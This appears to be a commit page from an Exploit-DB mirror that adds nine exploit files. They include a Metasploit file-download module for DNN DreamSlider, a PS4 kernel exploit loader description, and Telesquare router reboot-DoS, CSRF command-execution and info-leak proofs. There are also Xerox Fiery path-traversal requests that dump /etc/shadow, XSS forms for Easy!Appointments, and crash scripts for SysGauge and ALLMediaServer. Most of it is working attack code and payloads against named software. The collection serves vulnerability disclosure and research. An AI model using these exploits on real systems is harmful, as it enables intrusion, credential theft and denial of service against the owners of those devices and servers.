bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-12-28

Browse source 
9 changes to exploits/shellcodes

Telesquare SKT LTE Router SDT-CS3B1 - Denial of Service
SysGauge Server 3.6.18 - Denial of Service
ALLMediaServer 0.95 - Buffer Overflow

Sony Playstation 4 4.05 FW - Local Kernel Loader
Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure
Easy!Appointments 1.2.1 - Cross-Site Scripting
Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery
Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure
DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download
This commit is contained in:
Offensive Security 2017-12-28 05:02:19 +00:00
parent b91055c9da
commit 267f841bd8
10 changed files with 681 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

131
exploits/aspx/webapps/43405.rb Executable file
View file

@ -0,0 +1,131 @@
# Exploit Title: DotNetNuke DreamSlider Arbitrary File Download
# Date: 23/01/2014
# Author: Glafkos Charalambous
# Version: 01.01.02
# Vendor: DreamSlider
# Vendor URL: http://www.dreamslider.com/
# Google Dork: inurl:/DesktopModules/DreamSlider/
# CVE:
#
# Description
# DotNetNuke DreamSlider Module prior to version X suffer from a remote unauthenticated arbitrary file download vulnerability
#
# Vulnerable Code
#
# namespace DotNetNuke.Modules.DreamSlider
# {
# using System;
# using System.IO;
# using System.Web.SessionState;
# using System.Web.UI;
#
# public class DownloadProvider : Page, IRequiresSessionState
# {
# protected void Page_Load(object sender, EventArgs e)
# {
# if (!base.IsPostBack && (base.Request.QueryString["File"] != null))
# {
# string path = base.Request.QueryString["File"];
# string fileName = Path.GetFileName(path);
# base.Response.ContentType = "application/octet-stream";
# base.Response.AddHeader("Content-Disposition", "attachment; filename=" + fileName);
# base.Response.WriteFile(path);
# base.Response.End();
# }
# }
# }
# }
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'DotNetNuke DreamSlider Arbitrary File Download',
'Description' => %q{
This module exploits an unauthenticated arbitrary file download vulnerability in DNN
DreamSlider version 01.01.02 and below.
},
'Author' =>
[
'Glafkos Charalambous', # Discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://metasploit.com' ]
],
'DisclosureDate' => 'Mar 23 2015'))
register_options(
[
Opt::RPORT(80),
OptString.new('FILENAME', [true, 'File to download', '~/web.config']),
OptString.new('PATH', [true, 'Path of DNN Nuke', '/']),
], self.class)
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx"),
'cookie' => datastore['Cookie'],
})
if res && res.code == 200 and res.body.to_s =~ /Download Provider/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Safe
end
end
def run
begin
print_status("#{peer} - Downloading file #{datastore['FILENAME']}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx?File=") + datastore['FILENAME'],
'cookie' => datastore['Cookie'],
})
rescue Rex::ConnectionError
print_error("#{peer} - Could not connect.")
return
end
if res && res.code == 200
if res.body.to_s.bytesize == 0
print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.")
return
end
fileName = datastore['FILENAME']
path = store_loot(
'ds.http',
'application/octet-stream',
datastore['RHOST'],
res.body,
fileName
)
print_good("#{peer} - File saved in: #{path}")
else
print_error("#{peer} - Failed to download file.")
end
end
end

32
exploits/bsd/local/43397.md Normal file
View file

@ -0,0 +1,32 @@
# PS4 4.05 Kernel Exploit
---
## Summary
In this project you will find a full implementation of the "namedobj" kernel exploit for the PlayStation 4 on 4.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, *does not* contain any code related to defeating anti-piracy mechanisms or running homebrew. This exploit does include a loader that listens for payloads on port `9020` and will execute them upon receival.
You can find fail0verflow's original write-up on the bug [here](https://fail0verflow.com/blog/2017/ps4-namedobj-exploit/), you can find my technical write-up which dives more into implementation specifics ~~here~~ (this is still in progress and will be published within the next few days).
## Patches Included
The following patches are made by default in the kernel ROP chain:
1) Disable kernel write protection
2) Allow RWX (read-write-execute) memory mapping
3) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process
4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation.
## Notes
- This exploit is actually incredibly stable at around 95% in my tests. WebKit very rarely crashes and the same is true with kernel.
- I've built in a patch so the kernel exploit will only run once on the system. You can still make additional patches via payloads.
- A custom syscall is added (#11) to execute any RWX memory in kernel mode, this can be used to execute payloads that want to do fun things like jailbreaking and patching the kernel.
- An SDK is not provided in this release, however a barebones one to get started with may be released at a later date.
- I've released a sample payload [here](http://www.mediafire.com/file/n4boybw0e06h892/debug_settings.bin) that will make the necessary patches to access the debug menu of the system via settings, jailbreaks, and escapes the sandbox.
## Contributors
I was not alone in this exploit's development, and would like to thank those who helped me along the way below.
- [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
- [Flatz](https://twitter.com/flat_z)
- [CTurt](https://twitter.com/CTurtE)
- Anonymous
E-DB Note: Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43397.zip

62
exploits/hardware/dos/43401.py Executable file
View file

@ -0,0 +1,62 @@
#!/usr/bin/env python
#
#
# Telesquare SKT LTE Router SDT-CS3B1 Remote Reboot Denial Of Service
#
#
# Vendor: Telesquare Co., Ltd.
# Product web page: http://www.telesquare.co.kr
# Affected version: FwVer: SDT-CS3B1, sw version 1.2.0
# LteVer: ML300S5XEA41_090 1 0.1.0
# Modem model: PM-L300S
#
# Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G
# LTE wireless communication based LTE router product.
#
# Desc: The router suffers from an unauthenticated reboot command execution.
# Attackers can exploit this issue to cause a denial of service scenario.
#
# --------------------------------------------------------------------
# /lte/lteuicc.shtml:
# -------------------
#
# 858: function RebootRequest()
# 859: {
# 860: var url = "../cgi-bin/lte.cgi?";
# 861: var param = "Command=Reboot";
# 862: XHRPost(RebootHandle, url, param, false ); //sync call
# 863: }
#
# --------------------------------------------------------------------
#
# Tested on: lighttpd/1.4.20
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5444
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5444.php
#
#
# 22.12.2017
#
import sys, requests
if len(sys.argv) < 2:
print 'SKT LTE Router SDT-CS3B1 Remote Reboot'
print 'Usage: b00t.py <ip> <port>\n'
quit()
ip = sys.argv[1]
port = sys.argv[2]
r = requests.get("http://"+ip+":"+port+"/cgi-bin/lte.cgi?Command=Reboot")
# shw: while true; do ./b00t.py 10.0.0.17 8081; sleep 20; done
#print r.content #if in r.content: <xml></xml>, reboot true.
print "Router rebooted."

55
exploits/hardware/webapps/43400.html Normal file
View file

@ -0,0 +1,55 @@
Telesquare SKT LTE Router SDT-CS3B1 CSRF System Command Execution
Vendor: Telesquare Co., Ltd.
Product web page: http://www.telesquare.co.kr
Affected version: FwVer: SDT-CS3B1, sw version 1.2.0
LteVer: ML300S5XEA41_090 1 0.1.0
Modem model: PM-L300S
Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G
LTE wireless communication based LTE router product.
Desc: The router suffers from authenticated arbitrary system command
execution. The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform certain actions
with administrative privileges if a logged-in user visits a malicious
web site.
Tested on: lighttpd/1.4.20
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5443
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5443.php
22.12.2017
--
IDOR for system command interface:
----------------------------------
GET /admin/system_command.shtml HTTP/1.1
PoC GET CSRF request:
---------------------
<html>
<body>
<form action="http://10.0.0.17:8081/cgi-bin/admin.cgi">
<input type="hidden" name="Command" value="sysCommand" />
<input type="hidden" name="Cmd" value="uname%20-a" />
<input type="hidden" name="T" value="8168008531337" />
<input type="submit" value="Send" />
</form>
</body>
</html>

53
exploits/hardware/webapps/43402.txt Normal file
View file

@ -0,0 +1,53 @@
Telesquare SKT LTE Router SDT-CS3B1 Insecure Direct Object Reference Info Leak
Vendor: Telesquare Co., Ltd.
Product web page: http://www.telesquare.co.kr
Affected version: FwVer: SDT-CS3B1, sw version 1.2.0
LteVer: ML300S5XEA41_090 1 0.1.0
Modem model: PM-L300S
Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G
LTE wireless communication based LTE router product.
Desc: Insecure direct object references occur when an application
provides direct access to objects based on user-supplied input. As
a result of this vulnerability attackers can bypass authorization
and access resources and functionalities in the system.
Tested on: lighttpd/1.4.20
Linux mips
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5445
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5445.php
22.12.2017
--
/home.html << Version and status info leak (firmware, device, type, modem, lte)
/index.html << Version and status info leak (firmware, device, type, modem, lte)
/nas/smbsrv.shtml << Samba server settings (workgroup, netbios name)
/nas/ftpsrv.shtml << FTP settings
/wifi2g/basic.shtml << Wireless settings
/admin/status.shtml << Access point status info leak
/internet/wan.shtml << WAN settings info leak (wanip, subnet, gateway, macaddr, lteipaddr, dns)
/internet/lan.shtml << LAN settings info leak (dhcpip, lanip, macaddr, gateway, subnet, dns)
/admin/statistic.shtml << System statistics info leak
/admin/management.shtml << System management (account settings, ntp settings, ddns settings)
/serial/serial_direct.shtml << Direct serial settings (network connection settings, serverip, port)
/admin/system_command.shtml << System command interface
/internet/dhcpcliinfo.shtml << DHCP Clients info leak (hostname, macaddr, ipaddr)
/admin/upload_firmware.shtml << Router firmware and lte firmware upgrade
/firewall/vpn_futuresystem.shtml << VPN settings (udp packet transfer, icmp check)
/cgi-bin/lte.cgi?Command=getUiccState << GetUiccState()
/cgi-bin/lte.cgi?Command=getModemStatus << Modem status info leak
/cgi-bin/systemutil.cgi?Command=SystemInfo << System info leak

142
exploits/php/webapps/43398.txt Normal file
View file

@ -0,0 +1,142 @@
Xerox DC260 EFI Fiery Controller Webtools 2.0 Arbitrary File Disclosure
Vendor: Electronics for Imaging, Inc.
Product web page: http://www.efi.com
Affected version: EFI Fiery Controller SW2.0
Xerox DocuColor 260, 250, 242
Summary: Drive production profitability with Fiery servers and workflow
products. See which Fiery digital front end is right for your current
or future print engines and business needs. Manage all your printers
from a single screen using this intuitive print job management interface.
Desc: Input passed thru the 'file' GET parameter in 'forceSave.php'
script is not properly sanitized before being used to read files. This
can be exploited by an unauthenticated attacker to read arbitrary files
on the affected system.
======================================================================
/wt3/js/save.js:
----------------
103: function parseSaveMessages() {
104: var urlNode = saveDocument.getElementsByTagName('url').item(0);
105: var url = urlNode.firstChild.data;
106: var forcedSaveUrl = "forceSave.php?file=" + url;
107: window.open(forcedSaveUrl, 'save_iframe', 'width=1,height=1');
====
/wt3/forceSave.php:
-------------------
1. <?php
2. //code posted by chrisputnam at gmail dot com
3. function readfile_chunked($filename,$retbytes=true)
4. {
5. $chunksize = 1*(1024*1024); // how many bytes per chunk
6. $buffer = '';
7. $cnt =0;
8. // $handle = fopen($filename, 'rb');
9. $handle = fopen($filename, 'rb');
10. if ($handle === false)
11. {
12. return false;
13. }
14. while (!feof($handle))
15. {
16. //read a chunk
17. $buffer = fread($handle, $chunksize);
18. //send the chunk
19. echo $buffer;
20. //flush the chunk
21. flush();
22. //increment the size read/sent
23. if ($retbytes)
24. {
25. $cnt += strlen($buffer);
26. }
27. }
28. //close file
29. $status = fclose($handle);
30. if ($retbytes && $status)
31. {
32. return $cnt; // return num. bytes delivered like readfile() does.
33. }
34. return $status;
35. }
36.
37. $filename = $_GET['file'];
38. if(!$filename)
39. {
40. echo "ERROR: No filename specified. Please try again.";
41. }
42. else
43. {
44. // fix for IE caching or PHP bug issue
45. header("Pragma: public");
46. header("Expires: 0"); // set expiration time
47. header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
48. // browser must download file from server instead of cache
49.
50. // force download dialog
51. header("Content-Type: application/force-download");
52. header("Content-Type: application/octet-stream");
53. header("Content-Type: application/download");
54.
55. // use the Content-Disposition header to supply a recommended filename and
56. // force the browser to display the save dialog.
57. header("Content-Disposition: attachment; filename=" . basename($filename) . ";");
58. header("Content-Transfer-Encoding: binary");
59.
60. header("Content-Length: " . filesize($filename));
61.
62. set_time_limit(0);
63. readfile_chunked($filename, false);
64.
65. exit();
66. }
67.
68. ?>
======================================================================
Tested on: Debian GNU/Linux 3.1
Apache
PHP/5.4.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5447
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php
20.12.2017
--
# curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
games:x:5:100:games:/usr/games:/bin/sh
...
...
# curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/shadow"
root:LUUVeT6GbOy9I:10978:0:99999:7:::
daemon:*:10979:0:99999:7:::
bin:*:10979:0:99999:7:::
sys:*:10979:0:99999:7:::
sync:*:10979:0:99999:7:::
games:*:10979:0:99999:7:::
...
...

112
exploits/php/webapps/43399.txt Normal file
View file

@ -0,0 +1,112 @@
Easy!Appointments v1.2.1 Multiple Stored XSS Vulnerabilities
Vendor: Alex Tselegidis
Product web page: http://www.easyappointments.org
Affected version: 1.2.1
Summary: Easy!Appointments is a highly customizable web application
that allows your customers to book appointments with you via the web.
Moreover, it provides the ability to sync your data with Google Calendar
so you can use them with other services. It is an open source project
and you can download and install it even for commercial use. Easy!Appointments
will run smoothly with your existing website, because it can be installed
in a single folder of the server and of course, both sites can share
the same database. Learn more about the project in the Features page.
Desc: The application suffers from multiple stored and reflected XSS
vulnerabilities. The issues are triggered when an unauthorized input
passed via multiple POST and GET parameters is not properly sanitized
before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context
of an affected site.
Tested on: Apache/2.4.23 (Win32)
OpenSSL/1.0.2h
MariaDB-10.1.19
PHP/5.6.28
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5442
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5442.php
20.10.2017
--
PoC:
{"name":"XSS1","description":"Description"}
<html>
<body>
<form action="http://10.211.55.3/easyappointments121/index.php/backend_api/ajax_save_service_category" method="POST">
<input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
<input type="hidden" name="category" value="&#123;"name"&#58;"XSS1"&#44;"description"&#58;"Description"&#125;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
---
<html>
<body>
<form action="http://10.211.55.3/easyappointments121/index.php/appointments/ajax_get_available_hours" method="POST">
<input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
<input type="hidden" name="service&#95;id" value='"><script>alert(2)</script>' />
<input type="hidden" name="provider&#95;id" value="85" />
<input type="hidden" name="selected&#95;date" value="2017&#45;11&#45;30" />
<input type="hidden" name="service&#95;duration" value="30" />
<input type="hidden" name="manage&#95;mode" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
---
<html>
<body>
<form action="http://10.211.55.3/easyappointments121/index.php/appointments/ajax_get_available_hours" method="POST">
<input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
<input type="hidden" name="service&#95;id" value="13" />
<input type="hidden" name="provider&#95;id" value="85" />
<input type="hidden" name="selected&#95;date" value="<marquee>" />
<input type="hidden" name="service&#95;duration" value="30" />
<input type="hidden" name="manage&#95;mode" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
---
<html>
<body>
<form action="http://10.211.55.3/easyappointments121/index.php/appointments/ajax_register_appointment" method="POST">
<input type="hidden" name="csrfToken" value="f5300ab64a4fae7bc3e56f2502905459" />
<input type="hidden" name="post&#95;data&#91;customer&#93;&#91;last&#95;name&#93;" value="sdadsd" />
<input type="hidden" name="post&#95;data&#91;customer&#93;&#91;first&#95;name&#93;" value="asdasd" />
<input type="hidden" name="post&#95;data&#91;customer&#93;&#91;email&#93;" value="asdasd&#64;bbb&#46;dd" />
<input type="hidden" name="post&#95;data&#91;customer&#93;&#91;phone&#95;number&#93;" value="1112223333" />
<input type="hidden" name="post&#95;data&#91;customer&#93;&#91;address&#93;" value="" />
<input type="hidden" name="post&#95;data&#91;customer&#93;&#91;city&#93;" value="" />
<input type="hidden" name="post&#95;data&#91;customer&#93;&#91;zip&#95;code&#93;" value="" />
<input type="hidden" name="post&#95;data&#91;appointment&#93;&#91;start&#95;datetime&#93;" value=""><script>alert&#40;3&#41;<&#47;script>" />
<input type="hidden" name="post&#95;data&#91;appointment&#93;&#91;end&#95;datetime&#93;" value="2017&#45;11&#45;30&#32;16&#58;00&#58;00" />
<input type="hidden" name="post&#95;data&#91;appointment&#93;&#91;notes&#93;" value="" />
<input type="hidden" name="post&#95;data&#91;appointment&#93;&#91;is&#95;unavailable&#93;" value="false" />
<input type="hidden" name="post&#95;data&#91;appointment&#93;&#91;id&#95;users&#95;provider&#93;" value="85" />
<input type="hidden" name="post&#95;data&#91;appointment&#93;&#91;id&#95;services&#93;" value="13" />
<input type="hidden" name="post&#95;data&#91;manage&#95;mode&#93;" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

41
exploits/windows/dos/43403.py Executable file
View file

@ -0,0 +1,41 @@
# Exploit Title: SysGauge Server 3.6.18 - DOS
# Date: 2017-10-20
# Exploit Author: Ahmad Mahfouz
# Software Link: hhttp://www.sysgauge.com/setups/sysgaugesrv_setup_v3.6.18.exe
# Version: v3.6.18
# Category; Windows Remote DOS
# CVE: CVE-2017-15667
# Author Homepage: www.unixawy.com
# Description: SysGauge Server 3.6.18 the Control Protocl suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9221.
#!/usr/bin/env python
import socket
target = "192.168.72.133"
port = 9221
s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,port))
packet = "\x75\x19\xba\xab\x03"
packet +="\x00\x00\x00\x01\x00\x00\x00\x1a"
packet += "\x00"
packet += "\x3e"
packet += "\x00"
packet += "\x20"
packet += "\x00"
packet += "\x00"
packet += "\x00"
packet += "\x00\x00\x00\x00"
packet += "SERVER_GET_INFO"
packet += "\x02\x32\x01"
packet += "Data"
packet += "\x01\x30\x01\x00"
packet += "\x04\x02\x74"
packet += "\x18\x18\x00"
s.send(packet)
try:
         data = s.recv(100)
except:
         print "K1LL3D"

44
exploits/windows/dos/43406.py Executable file
View file

@ -0,0 +1,44 @@
# Exploit Title: Buffer overflow in ALLPlayer ALLMediaServer 0.95 and earlier
# CVE: CVE-2017-17932
# Date: 27-12-2017
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://www.allmediaserver.org/
# Category: webapps
# Attack Type: Remote
# Impact: Code execution and/or Denial of Service
1. Description
A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. Te exploit this vulnerability, an attacker must connect to the server with a long-malicious string.
2. Proof of Concept
#!/usr/bin/python
#NOTE: I found this bug via patch-diffing and I had IDA Pro set up as my Just-In-Time debugger at the time of the crash but any debugger should work.
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.205.131', 888))
buffer = "A" * 3000
s.send(buffer)
s.close()
if __name__ == '__main__':
import socket
main()

9
files_exploits.csv
View file

@ -5433,6 +5433,9 @@ id,file,description,date,author,type,platform,port
43373,exploits/windows/dos/43373.txt,"Intel Content Protection HECI Service - Type Confusion Privilege Escalation",2017-12-19,"Google Security Research",dos,windows,
43380,exploits/windows/dos/43380.cpp,"Microsoft Windows Kernel - 'NtQueryVirtualMemory(MemoryMappedFilenameInformation)' Double-Write Ring-0 Address Leak",2017-12-20,"Google Security Research",dos,windows,
43391,exploits/windows/dos/43391.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow",2017-12-26,"Aloyce J. Makalanga",dos,windows,
43401,exploits/hardware/dos/43401.py,"Telesquare SKT LTE Router SDT-CS3B1 - Denial of Service",2017-12-27,LiquidWorm,dos,hardware,
43403,exploits/windows/dos/43403.py,"SysGauge Server 3.6.18 - Denial of Service",2017-12-27,"Ahmad Mahfouz",dos,windows,
43406,exploits/windows/dos/43406.py,"ALLMediaServer 0.95 - Buffer Overflow",2017-12-27,"Aloyce J. Makalanga",dos,windows,
41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
@ -9235,6 +9238,7 @@ id,file,description,date,author,type,platform,port
43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change (PoC)",2017-12-04,gellin,local,windows,
43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,
43397,exploits/bsd/local/43397.md,"Sony Playstation 4 4.05 FW - Local Kernel Loader",2017-12-27,Specter,local,bsd,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -37669,6 +37673,11 @@ id,file,description,date,author,type,platform,port
43394,exploits/php/webapps/43394.txt,"Biometric Shift Employee Management System 3.0 - Local File Disclosure",2017-12-26,"Ihsan Sencan",webapps,php,
43395,exploits/php/webapps/43395.php,"Sendroid < 6.5.0 - SQL Injection",2017-12-26,"Onwuka Gideon",webapps,php,
43396,exploits/php/webapps/43396.txt,"SilverStripe CMS 3.6.2 - CSV Excel Macro Injection",2017-12-26,"Ishaq Mohammed",webapps,php,
43398,exploits/php/webapps/43398.txt,"Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure",2017-12-27,LiquidWorm,webapps,php,
43399,exploits/php/webapps/43399.txt,"Easy!Appointments 1.2.1 - Cross-Site Scripting",2017-12-27,LiquidWorm,webapps,php,
43400,exploits/hardware/webapps/43400.html,"Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery",2017-12-27,LiquidWorm,webapps,hardware,
43402,exploits/hardware/webapps/43402.txt,"Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure",2017-12-27,LiquidWorm,webapps,hardware,
43405,exploits/aspx/webapps/43405.rb,"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download",2017-12-27,"Glafkos Charalambous",webapps,aspx,
41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,

Can't render this file because it is too large.